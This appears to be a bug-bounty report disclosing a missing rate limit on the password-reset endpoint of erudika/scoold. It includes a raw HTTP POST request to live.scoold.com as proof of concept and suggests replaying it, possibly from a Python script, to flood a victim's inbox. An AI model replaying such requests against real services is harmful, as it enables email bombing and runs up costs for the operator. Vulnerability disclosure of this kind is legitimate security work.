Insufficient Granularity of Access Control in erudika/scoold
Aug 1st 2021
Bypass rate limit and sent unlimited email to any email address.
Attacker can sent unlimited email to any mail address . Many email service provider has limited email sending like 10000 email per month . If you exeed that limit then you will be extra charged . So, using this attack attacker can exeed that limit and company will be charged extra money.
🕵️♂️ Proof of Concept
During password-reset email sending there is not rate limit , which allow attacker to sent unlimited email to any mail address . Bellow request is vulnerable to this
POST /signin/iforgot HTTP/1.1 Host: live.scoold.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://live.scoold.com/ Content-Type: application/x-www-form-urlencoded Content-Length: 36 Origin: https://live.scoold.com DNT: 1 Connection: close Cookie: drift_campaign_refresh=6120fffa-1159-4d14-9bb5-eff77e486c0a; drift_aid=fa0512b1-8634-43c6-8abc-7febc322ef3f; driftt_aid=fa0512b1-8634-43c6-8abc-7febc322ef3f Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 token=&email=momosaf219%40aline9.com
Here in this postdata change
Now sent this request unlimited time and victim email address will received unlimited verification email . Also attacker can make this as python code and send unlimited email
You should set rate limit there to prevent this